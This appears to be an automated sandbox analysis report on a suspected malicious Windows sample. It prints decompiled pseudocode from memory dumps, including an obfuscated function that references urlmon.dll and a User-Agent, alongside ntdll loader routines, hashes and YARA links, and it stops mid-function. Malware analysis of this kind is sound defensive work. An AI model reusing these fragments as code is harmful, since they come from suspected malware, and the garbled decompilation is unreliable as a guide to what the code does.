                                  			E004157AA(void* __eax, signed char __ebx, void* __ecx, void* __edx, signed char __edi, void* __esi, void* __eflags, void* __fp0) {
				signed char _t26;
				signed int _t34;
				signed char _t36;
				signed int _t37;
				signed char _t39;
				void* _t43;
				void* _t48;
				signed int _t56;
				void* _t61;

				L0:
				while(1) {
					L0:
					_t43 = __ecx;
					_t39 = __ebx;
					asm("das");
					if(__eflags < 0) {
						break;
					}
					L11:
					_push(ss);
					__bh = __bh |  *__ecx;
					__eflags = __bh;
					if(__eflags >= 0) {
						L14:
						L16:
						if(__eflags > 0) {
							L18:
							 *_t26 =  *_t26 & _t26;
							_push(ss);
							 *((intOrPtr*)(_t26 + _t43 - 1)) =  *((intOrPtr*)(_t26 + _t43 - 1)) + _t26 + _t43 - 1;
							_t23 = _t61 - 0x24; // 0x6d6c7275
							__eflags =  *((intOrPtr*)(_t61 + 8)) + 0xc94;
							_t56 = E00413E50( *((intOrPtr*)(_t61 + 8)) + 0xc94, E00409B40( *((intOrPtr*)(_t61 + 8)) + 0xc94,  *((intOrPtr*)(_t61 + 8)) + 0xc94, _t23), 0, 0, 0x69767207);
							L19:
							asm("lock add esp, 0x28");
							__eflags = _t56;
							if(_t56 == 0) {
								L22:
								__eflags = 0;
								return 0;
							} else {
								L20:
								_t34 =  *_t56(0, E0041A390(_t48) + _t48, _t61 - 4);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L22;
								} else {
									L21:
									return 1;
								}
							}
						} else {
							L17:
							_t36 = _t39;
							__eflags = _t36 & 0x69453e52;
							asm("outsd");
							_t37 = _t36 &  *(_t26 - 0x68);
							__eflags = _t37;
							asm("arpl [eax-0x19cfcce5], di");
							asm("loopne 0x32");
							return _t37;
						}
					} else {
						L12:
						asm("scasd");
						 *0x529d6c8a = __eax;
						__al = __al - 0xcc;
						asm("cmpsd");
						__eflags = __esp - __edi;
						if(__eflags >= 0) {
							_push(__ebx);
							_push(__edi);
							__ebx = __ebx + 1;
							__ebx = __ebx - 1;
							asm("enter 0x90ab, 0xfe");
							asm("o16 jge 0x7e");
							__dl = 0xe6;
							__edx = __edx - 1;
							__eflags = __edx;
							_t3 = __edx - 0x618a279f;
							_t4 = __ah;
							__ah =  *_t3;
							 *_t3 = _t4;
						} else {
							 *[cs:ebx+0x72fc0a61] = __dh;
							asm("into");
							asm("pushad");
							_t13 = __eax - 0x6678bb3c;
							_t14 = __dl;
							__dl =  *_t13;
							 *_t13 = _t14;
							_pop(ss);
							asm("enter 0x3aa, 0xa1");
							asm("out dx, eax");
						}
						L5:
						asm("popad");
						__fp0 = __fp0 /  *(__ebp - 0x62);
						__edx =  *(__esi + __edx * 8) * 0x3b;
						__edx = __edx - 1;
						__edi = 0xf5f30346;
						__esi = __ebx;
						asm("retf");
						_t8 = __eax;
						__eax = __ecx;
						__ecx = _t8;
						asm("int3");
						L7:
						asm("out 0x73, al");
						L8:
						while(__eflags > 0) {
							__eflags = __eax & 0x9372fc31;
							_t11 = __eax;
							__eax = __edx;
							__edx = _t11;
							__bh = __bh +  *((intOrPtr*)(__edx + 0x1dbec823));
							__eflags = __bh;
							__esp = __esp + 1;
							_push(ds);
							asm("adc [esi], cl");
							_push(__ecx);
							_push(__ecx);
							asm("sti");
							asm("faddp st1, st0");
							if(__eflags > 0) {
								continue;
							} else {
								L10:
								goto L0;
							}
							goto L23;
						}
						_t1 = __ebp - 0x73;
						 *_t1 =  *(__ebp - 0x73) << 0x56;
						__eflags =  *_t1;
					}
					L23:
				}
				L15:
				asm("ror byte [ebx], cl");
				_t26 = __edi;
				_t48 = __eax;
				_t16 = _t61 + 0x7f6cb721;
				 *_t16 =  *(_t61 + 0x7f6cb721) + __ecx;
				__eflags =  *_t16;
				goto L16;
			}












                                  0x004157aa
                                  0x004157aa
                                  0x004157aa
                                  0x004157aa
                                  0x004157aa
                                  0x004157aa
                                  0x004157ab
                                  0x00000000
                                  0x00000000
                                  0x004157ad
                                  0x004157ad
                                  0x004157ae
                                  0x004157ae
                                  0x004157b0
                                  0x0041581c
                                  0x00415833
                                  0x00415833
                                  0x004158a2
                                  0x004158a2
                                  0x004158a6
                                  0x004158a8
                                  0x004158ad
                                  0x004158b1
                                  0x004158cd
                                  0x004158ce
                                  0x004158ce
                                  0x004158d2
                                  0x004158d4
                                  0x004158f9
                                  0x004158fa
                                  0x00415900
                                  0x004158d6
                                  0x004158d6
                                  0x004158e8
                                  0x004158ea
                                  0x004158ec
                                  0x00000000
                                  0x004158ee
                                  0x004158ee
                                  0x004158f8
                                  0x004158f8
                                  0x004158ec
                                  0x00415835
                                  0x00415835
                                  0x00415835
                                  0x00415836
                                  0x0041583b
                                  0x0041583c
                                  0x0041583c
                                  0x0041583f
                                  0x00415845
                                  0x0041584f
                                  0x0041584f
                                  0x004157b2
                                  0x004157b2
                                  0x004157b2
                                  0x004157b3
                                  0x004157b8
                                  0x004157ba
                                  0x004157bb
                                  0x004157bd
                                  0x00415763
                                  0x00415764
                                  0x00415765
                                  0x00415769
                                  0x0041576a
                                  0x0041576e
                                  0x00415771
                                  0x00415773
                                  0x00415773
                                  0x00415774
                                  0x00415774
                                  0x00415774
                                  0x00415774
                                  0x004157bf
                                  0x004157bf
                                  0x004157c6
                                  0x004157c7
                                  0x004157c8
                                  0x004157c8
                                  0x004157c8
                                  0x004157c8
                                  0x004157cf
                                  0x004157d0
                                  0x004157d4
                                  0x004157d4
                                  0x00415776
                                  0x00415776
                                  0x00415777
                                  0x0041577a
                                  0x0041577f
                                  0x00415780
                                  0x00415785
                                  0x00415787
                                  0x00415788
                                  0x00415788
                                  0x00415788
                                  0x00415789
                                  0x0041578a
                                  0x0041578a
                                  0x00000000
                                  0x0041578c
                                  0x0041578e
                                  0x00415793
                                  0x00415793
                                  0x00415793
                                  0x00415794
                                  0x00415794
                                  0x0041579a
                                  0x0041579b
                                  0x0041579c
                                  0x0041579e
                                  0x0041579f
                                  0x004157a0
                                  0x004157a1
                                  0x004157a3
                                  0x00000000
                                  0x004157a5
                                  0x004157a5
                                  0x00000000
                                  0x004157a5
                                  0x00000000
                                  0x004157a3
                                  0x00415737
                                  0x00415737
                                  0x00415737
                                  0x00415737
                                  0x00000000
                                  0x004157b0
                                  0x0041582a
                                  0x0041582a
                                  0x0041582d
                                  0x0041582d
                                  0x0041582e
                                  0x0041582e
                                  0x0041582e
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                  • API String ID: 0-1367105278
                                  • Opcode ID: a6a268fcff0022dcd6bbb2e67d09aca66b1db5f4ffe4c1056632d4187e793186
                                  • Instruction ID: feac6a233371933784746111ca5c46658fd243908eca285433ab50e9c318133f
                                  • Opcode Fuzzy Hash: a6a268fcff0022dcd6bbb2e67d09aca66b1db5f4ffe4c1056632d4187e793186
                                  • Instruction Fuzzy Hash: 1C317A36949B949EDB129E919841BEEBF35DF92714F04008BD4406F281C3685E82C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019E8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E019E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1aad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1aa8464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1aa5780 & 0x00000003) != 0) {
							E01A35510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1aa5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E019FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1aa7984; // 0x1552b50
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1aa8464; // 0x75150110
					 *0x1aab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E019E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1aa5780 & 0x00000005) != 0) {
						_push(_t49);
						E01A35510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                  0x019e8e0f
                                  0x019e8e16
                                  0x019e8e19
                                  0x019e8e1b
                                  0x019e8e21
                                  0x019e8e7f
                                  0x019e8e85
                                  0x01a29354
                                  0x01a2936c
                                  0x01a29371
                                  0x01a2937b
                                  0x01a29381
                                  0x01a29381
                                  0x01a2937b
                                  0x019e8e9d
                                  0x019e8e9d
                                  0x019e8e29
                                  0x019e8e2c
                                  0x019e8e38
                                  0x019e8e3e
                                  0x019e8e43
                                  0x019e8eb5
                                  0x019e8eb9
                                  0x01a292aa
                                  0x01a292af
                                  0x01a292e8
                                  0x01a292e8
                                  0x01a292af
                                  0x019e8eb9
                                  0x019e8e45
                                  0x019e8e53
                                  0x019e8e5b
                                  0x019e8e5f
                                  0x019e8e78
                                  0x019e8e78
                                  0x019e8e7d
                                  0x019e8ec3
                                  0x019e8ecd
                                  0x019e8ed2
                                  0x019e8ed2
                                  0x019e8ec5
                                  0x019e8ec5
                                  0x00000000
                                  0x019e8e7d
                                  0x019e8e67
                                  0x019e8ea4
                                  0x01a2931a
                                  0x00000000
                                  0x00000000
                                  0x01a29320
                                  0x019e8ea4
                                  0x019e8e70
                                  0x01a29325
                                  0x01a29340
                                  0x01a29345
                                  0x01a29345
                                  0x019e8e76
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Strings
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 01A2932A
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01A2933B, 01A29367
                                  • LdrpFindDllActivationContext, xrefs: 01A29331, 01A2935D
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 01A29357
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  • Opcode ID: 25c3626c7ebb7d175b8e1dda973dbe4f893e1601e371a5f59d3f91316111aa41
                                  • Instruction ID: 906661d8e439aeb6ea85f0e7e051b5bf1332469f2644b794ca92ec3e52d55248
                                  • Opcode Fuzzy Hash: 25c3626c7ebb7d175b8e1dda973dbe4f893e1601e371a5f59d3f91316111aa41
                                  • Instruction Fuzzy Hash: 7B41F732E003169FDF37BADDC84CA76B6E8AB41656F49456DE90C57151E7707D808382
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019C8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E019C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E019C934A() != 0) {
								_t159 = E01A3A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1aa5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01A35510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1aa5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E019C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E019C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E019C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1aa5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1aa5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E019D2280(_t92, 0x1aa86cc);
															_t94 = E01A89DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E019E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1aa5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E019C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1aa5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1aa5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E019FF380(_t136, 0x1991184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E019D2280(_t108, 0x1aa86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E019E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01A89D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E019CFFB0(_t118, _t156, 0x1aa86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E019F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                  0x019c8799
                                  0x019c879d
                                  0x019c87a1
                                  0x019c87a3
                                  0x019c87a8
                                  0x019c87c3
                                  0x019c87c3
                                  0x019c87c8
                                  0x019c87d1
                                  0x019c87d4
                                  0x019c87d8
                                  0x019c87e5
                                  0x019c87ec
                                  0x01a19bfe
                                  0x01a19c00
                                  0x01a19c02
                                  0x01a19c08
                                  0x01a19c0d
                                  0x01a19c0f
                                  0x01a19c14
                                  0x01a19c2d
                                  0x01a19c32
                                  0x01a19c37
                                  0x01a19c3a
                                  0x01a19c3c
                                  0x01a19c42
                                  0x01a19c42
                                  0x01a19c3c
                                  0x01a19c02
                                  0x019c87da
                                  0x019c87df
                                  0x019c87e3
                                  0x00000000
                                  0x00000000
                                  0x019c87e3
                                  0x019c87f2
                                  0x00000000
                                  0x019c87fb
                                  0x019c87fd
                                  0x019c87fe
                                  0x019c880e
                                  0x019c880f
                                  0x019c8810
                                  0x019c8814
                                  0x019c881a
                                  0x019c881c
                                  0x019c881f
                                  0x019c8821
                                  0x019c8822
                                  0x019c8824
                                  0x019c8826
                                  0x019c882c
                                  0x019c882e
                                  0x01a19c48
                                  0x01a19c48
                                  0x019c8834
                                  0x019c8834
                                  0x019c8837
                                  0x00000000
                                  0x00000000
                                  0x019c8837
                                  0x019c882e
                                  0x019c883d
                                  0x019c8840
                                  0x019c8843
                                  0x019c8846
                                  0x019c8849
                                  0x019c884c
                                  0x019c884e
                                  0x019c8850
                                  0x019c8852
                                  0x019c8854
                                  0x019c8857
                                  0x019c88b4
                                  0x019c88b6
                                  0x019c88b6
                                  0x019c8859
                                  0x019c8859
                                  0x019c8859
                                  0x019c8861
                                  0x019c8866
                                  0x019c886a
                                  0x019c893d
                                  0x019c8941
                                  0x00000000
                                  0x019c8947
                                  0x019c8947
                                  0x019c894a
                                  0x019c894c
                                  0x00000000
                                  0x019c8952
                                  0x019c8955
                                  0x019c895a
                                  0x019c895d
                                  0x019c895d
                                  0x019c895f
                                  0x019c8961
                                  0x019c8961
                                  0x019c8968
                                  0x00000000
                                  0x00000000
                                  0x019c896a
                                  0x019c896b
                                  0x019c896e
                                  0x00000000
                                  0x019c8970
                                  0x019c8970
                                  0x019c8970
                                  0x019c8970
                                  0x019c8972
                                  0x019c8972
                                  0x019c8974
                                  0x00000000
                                  0x019c897a
                                  0x019c897a
                                  0x019c897d
                                  0x00000000
                                  0x019c8983
                                  0x01a19c65
                                  0x01a19c6d
                                  0x01a19c72
                                  0x01a19c75
                                  0x01a19c75
                                  0x01a19c82
                                  0x01a19c86
                                  0x01a19c87
                                  0x01a19c88
                                  0x01a19c89
                                  0x01a19c8c
                                  0x01a19c90
                                  0x01a19c95
                                  0x01a19c97
                                  0x01a19ca0
                                  0x01a19ca3
                                  0x01a19ca9
                                  0x01a19ca9
                                  0x00000000
                                  0x01a19ca9
                                  0x01a19ca3
                                  0x00000000
                                  0x01a19c97
                                  0x019c897d
                                  0x00000000
                                  0x019c8974
                                  0x019c8988
                                  0x019c8992
                                  0x019c8996
                                  0x00000000
                                  0x019c8996
                                  0x019c894c
                                  0x00000000
                                  0x019c8870
                                  0x019c887b
                                  0x019c887d
                                  0x019c887f
                                  0x019c8881
                                  0x019c8884
                                  0x019c8884
                                  0x019c8886
                                  0x019c8889
                                  0x019c888c
                                  0x019c888e
                                  0x019c8891
                                  0x019c8891
                                  0x019c8898
                                  0x00000000
                                  0x00000000
                                  0x019c889a
                                  0x019c889b
                                  0x019c889e
                                  0x00000000
                                  0x00000000
                                  0x019c88a0
                                  0x019c88a8
                                  0x019c88b0
                                  0x019c88b2
                                  0x019c88d3
                                  0x019c88d5
                                  0x00000000
                                  0x019c88d7
                                  0x019c88db
                                  0x019c88dc
                                  0x019c88e0
                                  0x019c88e8
                                  0x019c88ee
                                  0x019c88f0
                                  0x019c88f3
                                  0x019c88fc
                                  0x019c8901
                                  0x019c8906
                                  0x019c890c
                                  0x019c890c
                                  0x019c890f
                                  0x019c8916
                                  0x019c8917
                                  0x019c8918
                                  0x019c8919
                                  0x019c891a
                                  0x019c891f
                                  0x019c8921
                                  0x01a19c52
                                  0x01a19c55
                                  0x01a19c5b
                                  0x01a19cac
                                  0x01a19cc0
                                  0x01a19cc0
                                  0x01a19c55
                                  0x019c8927
                                  0x019c8927
                                  0x019c892f
                                  0x019c8933
                                  0x00000000
                                  0x019c88f5
                                  0x019c88f5
                                  0x00000000
                                  0x019c88f7
                                  0x019c88f7
                                  0x019c88fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x019c88fa
                                  0x019c88f5
                                  0x019c88f3
                                  0x00000000
                                  0x019c88d5
                                  0x00000000
                                  0x019c88b2
                                  0x019c88c9
                                  0x00000000
                                  0x019c88c9
                                  0x019c887f
                                  0x019c886a
                                  0x019c8857
                                  0x019c8852
                                  0x019c88bf
                                  0x019c88bf
                                  0x019c87aa
                                  0x019c87ad
                                  0x019c87ae
                                  0x019c87b4
                                  0x019c87b5
                                  0x019c87b6
                                  0x019c87b8
                                  0x019c87bd
                                  0x019c87c1
                                  0x019c87f4
                                  0x019c87fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x019c87c1
                                  0x00000000

                                  Strings
                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01A19C18
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01A19C28
                                  • LdrpDoPostSnapWork, xrefs: 01A19C1E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 2994545307-1948996284
                                  • Opcode ID: 7c9decce5b530eadd80d7a0162ed624075bbbaab979e8b94183af14a2ccbb246
                                  • Instruction ID: 3b823d7f2f9296daaaed2db05563c9d0651692f089b6d65d859b575526a4cbfb
                                  • Opcode Fuzzy Hash: 7c9decce5b530eadd80d7a0162ed624075bbbaab979e8b94183af14a2ccbb246
                                  • Instruction Fuzzy Hash: 9B912971A00216EFDF19DF59C880ABBB7B9FF84B15B44406DD989AB641E730ED01CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019C7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E019C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E019CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E019BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1aa5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01A35510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1aa5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E019D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E019D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01A37016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
